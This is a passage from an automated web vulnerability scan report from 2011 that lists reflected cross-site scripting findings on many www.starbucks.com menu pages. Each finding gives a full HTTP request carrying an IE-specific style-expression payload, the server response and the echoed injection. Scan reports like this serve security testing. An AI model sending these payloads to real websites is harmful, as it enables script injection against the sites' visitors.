<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/strawberries-and-creme-frappuccino-ice-cream?d87ac"style="x:expression(alert(1))"de1edf0e094=1"/>
...[SNIP]...

1.879. http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3a1e"style%3d"x%3aexpression(alert(1))"4551818f1b7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e3a1e"style="x:expression(alert(1))"4551818f1b7 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream?e3a1e"style%3d"x%3aexpression(alert(1))"4551818f1b7=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:31 GMT
Connection: close
Content-Length: 38897

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/ice-cream/vanilla-bean-frappuccino-ice-cream?e3a1e"style="x:expression(alert(1))"4551818f1b7=1"/>
...[SNIP]...

1.880. http://www.starbucks.com/menu/food/salads/farmers-market-salad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/farmers-market-salad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1a321"style%3d"x%3aexpression(alert(1))"41fb35d7151 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1a321"style="x:expression(alert(1))"41fb35d7151 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/farmers-market-salad?1a321"style%3d"x%3aexpression(alert(1))"41fb35d7151=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:03 GMT
Connection: close
Content-Length: 41349

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/farmers-market-salad?1a321"style="x:expression(alert(1))"41fb35d7151=1"/>
...[SNIP]...

1.881. http://www.starbucks.com/menu/food/salads/fruit-cup [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/fruit-cup

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70519"style%3d"x%3aexpression(alert(1))"4a15c0eea7e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 70519"style="x:expression(alert(1))"4a15c0eea7e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/fruit-cup?70519"style%3d"x%3aexpression(alert(1))"4a15c0eea7e=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:51 GMT
Connection: close
Content-Length: 40422

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/fruit-cup?70519"style="x:expression(alert(1))"4a15c0eea7e=1"/>
...[SNIP]...

1.882. http://www.starbucks.com/menu/food/salads/garden-pesto-salad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/garden-pesto-salad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 902fd"style%3d"x%3aexpression(alert(1))"a1481263ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 902fd"style="x:expression(alert(1))"a1481263ac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/garden-pesto-salad?902fd"style%3d"x%3aexpression(alert(1))"a1481263ac9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:31 GMT
Connection: close
Content-Length: 38600

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/garden-pesto-salad?902fd"style="x:expression(alert(1))"a1481263ac9=1"/>
...[SNIP]...

1.883. http://www.starbucks.com/menu/food/salads/picnic-pasta-salad [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/salads/picnic-pasta-salad

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5e882"style%3d"x%3aexpression(alert(1))"92587de2079 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e882"style="x:expression(alert(1))"92587de2079 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/salads/picnic-pasta-salad?5e882"style%3d"x%3aexpression(alert(1))"92587de2079=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:00:44 GMT
Connection: close
Content-Length: 41357

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/salads/picnic-pasta-salad?5e882"style="x:expression(alert(1))"92587de2079=1"/>
...[SNIP]...

1.884. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/chicken-santa-fe

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21399"style%3d"x%3aexpression(alert(1))"64c8a4cbb38 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 21399"style="x:expression(alert(1))"64c8a4cbb38 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/chicken-santa-fe?21399"style%3d"x%3aexpression(alert(1))"64c8a4cbb38=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:02:36 GMT
Connection: close
Content-Length: 42767

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/chicken-santa-fe?21399"style="x:expression(alert(1))"64c8a4cbb38=1"/>
...[SNIP]...

1.885. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 92a9e"style%3d"x%3aexpression(alert(1))"5df87dc4572 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 92a9e"style="x:expression(alert(1))"5df87dc4572 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich?92a9e"style%3d"x%3aexpression(alert(1))"5df87dc4572=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:01:41 GMT
Connection: close
Content-Length: 42082

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/egg-salad-sandwich?92a9e"style="x:expression(alert(1))"5df87dc4572=1"/>
...[SNIP]...

1.886. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 95062"style%3d"x%3aexpression(alert(1))"9a2157818d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 95062"style="x:expression(alert(1))"9a2157818d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella?95062"style%3d"x%3aexpression(alert(1))"9a2157818d9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:21 GMT
Connection: close
Content-Length: 42265

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-tomato-and-mozzarella?95062"style="x:expression(alert(1))"9a2157818d9=1"/>
...[SNIP]...

1.887. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d1782"style%3d"x%3aexpression(alert(1))"c12556678ba was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d1782"style="x:expression(alert(1))"c12556678ba in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini?d1782"style%3d"x%3aexpression(alert(1))"c12556678ba=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:03:15 GMT
Connection: close
Content-Length: 42828

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/roasted-vegetable-panini?d1782"style="x:expression(alert(1))"c12556678ba=1"/>
...[SNIP]...

1.888. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367b2"style%3d"x%3aexpression(alert(1))"e74a53c9b86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 367b2"style="x:expression(alert(1))"e74a53c9b86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich?367b2"style%3d"x%3aexpression(alert(1))"e74a53c9b86=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:00 GMT
Connection: close
Content-Length: 43358

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/tarragon-chicken-salad-sandwich?367b2"style="x:expression(alert(1))"e74a53c9b86=1"/>
...[SNIP]...

1.889. http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fdb42"style%3d"x%3aexpression(alert(1))"28976a77c79 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as fdb42"style="x:expression(alert(1))"28976a77c79 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich?fdb42"style%3d"x%3aexpression(alert(1))"28976a77c79=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:04:26 GMT
Connection: close
Content-Length: 42483

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/sandwiches-panini-and-wraps/turkey-and-swiss-sandwich?fdb42"style="x:expression(alert(1))"28976a77c79=1"/>
...[SNIP]...

1.890. http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/dark-cherry-yogurt-parfait

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5726"style%3d"x%3aexpression(alert(1))"71244ff225 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as e5726"style="x:expression(alert(1))"71244ff225 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/yogurt/dark-cherry-yogurt-parfait?e5726"style%3d"x%3aexpression(alert(1))"71244ff225=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:05:50 GMT
Connection: close
Content-Length: 41443

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/dark-cherry-yogurt-parfait?e5726"style="x:expression(alert(1))"71244ff225=1"/>
...[SNIP]...

1.891. http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/greek-yogurt-honey-parfait

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54f34"style%3d"x%3aexpression(alert(1))"898a6039ac9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 54f34"style="x:expression(alert(1))"898a6039ac9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/yogurt/greek-yogurt-honey-parfait?54f34"style%3d"x%3aexpression(alert(1))"898a6039ac9=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:03 GMT
Connection: close
Content-Length: 41314

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en">
<head>
   <meta http-equiv="content
...[SNIP]...
<meta property="og:url" content="http://www.starbucks.com/menu/food/yogurt/greek-yogurt-honey-parfait?54f34"style="x:expression(alert(1))"898a6039ac9=1"/>
...[SNIP]...

1.892. http://www.starbucks.com/menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.starbucks.com
Path:   /menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74433"style%3d"x%3aexpression(alert(1))"de32106119b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 74433"style="x:expression(alert(1))"de32106119b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /menu/food/yogurt/strawberry-and-blueberry-yogurt-parfait?74433"style%3d"x%3aexpression(alert(1))"de32106119b=1 HTTP/1.1
Host: www.starbucks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmv=; _chartbeat2=vqos4oan0hnfddev; __utmz=1.1297134218.1.1.utmcsr=nypost.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utma=1.1829190624.1297134218.1297134218.1297134218.1; __utmc=1; __utmb=1.3.10.1297134218; ASP.NET_SessionId=s4hjlkajd33sdarjte2hrsoq; skin=;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
p3p: CP="CAO PSA OUR"
X-Powered-By: ASP.NET
Date: Tue, 08 Feb 2011 04:07:15 GMT
Connection: close
Content-Length: 41501

